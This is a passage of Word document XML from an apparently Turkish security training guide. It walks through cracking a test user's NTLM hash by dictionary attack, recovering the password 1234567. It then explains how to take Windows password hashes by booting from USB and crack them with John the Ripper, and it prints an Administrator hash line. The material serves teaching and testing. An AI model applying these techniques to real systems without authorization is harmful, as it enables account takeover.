        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68820E16" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kırmak istenilen kullanıcı satırının üstüne gelip sağ tıklanır ve buradan istenilen saldırı tipi ve hash türü seçilir. Burada “dictionary attack” ve ntlm seçilmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60635574" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C9C29B" wp14:editId="143B9977">
            <wp:extent cx="5760720" cy="3141669"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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41669"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD23FD2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E73EB8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735DF41B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766A92C9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718E2745" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758584D0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E451E6B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CACB647" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gelen ekranda saldırı yapılacak sözlük listesini vermek için, sağ tıklayıp add to list seçeneğine tıklanır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D99F9A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D7B25F3" wp14:editId="086BAC34">
            <wp:extent cx="4951109" cy="4518660"/>
            <wp:effectExtent l="0" t="0" r="190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75" cy="4519815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCC0AA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D084546" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715670A8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2CE255" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F38FC1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ADE8D6C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E42573" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597DA17A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A8AEAB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3941BECC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A41686F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A503960" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B5E38D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E78398" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB04339" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470FB5DA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C0455C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İlgili sözlük listesi seçilip start denilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31BA1B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25BA00F6" wp14:editId="6BC3AE70">
            <wp:extent cx="5090842" cy="393192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476" cy="3930092"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD75ED" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5861CFF3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7388BA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A510D2D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72736DBB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51459ED6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EB53FA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D018EAA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCAD882" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E101BE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0C9C16" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CCA51A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E69742" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A459D63" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB3B3B6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7802114D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="025E9C0E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029579EA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B72BBA9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B960EF8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C9045B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parolanın başarı ile kırıldığı görülmektedir. Test kullanıcısına ait parola 1234567 olarak tespit edilmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B8DCBD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D07ED0E" wp14:editId="441E215B">
            <wp:extent cx="5098415" cy="4624070"/>
            <wp:effectExtent l="0" t="0" r="6985" b="508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4624070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F93C05" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72803ADE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00902B70">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F598C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc430104860"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:t>Windows Parola Özetlerinin Kaba Kuvvet Saldırıları ile Kırılması</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="30FB364A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305E73F9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Açıklama: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows sistemlerde parolalar, açık bir halde tutulmamaktadır. Parolalar çeşitli algoritmalar ve fonksiyonlar ile geri dönüşümü imkânsız olacak şekilde tutulmaktadır. Parolaların geriş dönüşümü imkânsız olarak tutulsa da kullanıcılar tarafından alınmayan güvenlik önlemleri sayesinde sistemler yine tehlike altına girebilir. Örneğin bios ayarlarından sisteme parola konulmadı ise; sistem başka bir işletim sistemi ile başlatılabilir ve parola özet değerleri ele geçirilebilir. Ele geçirilen parola özet değerleri kaba kuvvet saldırıları ile orijinal değerleri bulunabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3293EF0D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uygulama: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hedef olarak seçilen bir sistemden USB ile başlatılarak ele geçirilmiş Windows parola özetleri JTR(Jo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>n The Ripper) kullanılarak kırılacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70468629" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Elde edilen kullanıcı parola özeti;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="7646EC13" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5C95B4D3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19DB848C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1578BB37" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hash değeri bir text dosyasına yazılır;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2E3FA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F26FC8" wp14:editId="39B72FB0">
            <wp:extent cx="5760720" cy="944245"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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4245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0D41A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Parolayı kırmak için JTR kullanımı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
